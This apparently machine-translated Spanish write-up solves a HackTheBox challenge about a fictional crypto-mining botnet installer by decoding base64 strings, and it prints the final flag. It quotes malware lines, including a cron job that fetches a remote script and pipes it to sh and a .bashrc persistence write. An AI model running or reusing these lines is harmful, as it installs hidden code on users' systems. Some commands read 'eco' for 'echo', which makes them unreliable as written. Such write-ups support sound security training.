Descripción
En la carrera por Vitalium en Marte, la malvada Junta de Arodor recurrió a medidas desesperadas, necesitando fondos para sus intentos de minería. Idearon una botnet diseñada específicamente para extraer criptomonedas de forma encubierta. Nos topamos con una muestra del instalador del minero de Arodor en nuestro servidor. Reconociendo la gravedad de la situación, iniciamos una investigación exhaustiva. Contigo como líder, necesitas desentrañar el funcionamiento interno del mecanismo de instalación. El descubrimiento sirvió como un punto de inflexión y reveló el alcance de la desesperación de Arodor. Sin embargo, la batalla por Vitalium continuó, instándonos a permanecer alerta y adaptar nuestras ciberdefensas para contrarrestar futuras amenazas.
Obtenga notas del certificado OSCP
El curso completo y práctico de pruebas de penetración de aplicaciones web
El desafío muestra un script bash muy largo que tiene algunas cadenas codificadas en base64 como las que se muestran a continuación
URL local =”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”
destino=$(echo “X3QwX200cnN9Cg==”|base64 -d)
eco “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc
eco '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
Todo lo que tenemos que hacer es decodificar en base64 esas cadenas y reunir las partes que componen la bandera final.
$ eco cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ eco “X3QwX200cnN9Cg==”|base64 -d
$ eco “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d
$ eco -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
Bandera final
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
Lista de reproducción de tutoriales en vídeo de HackTheBox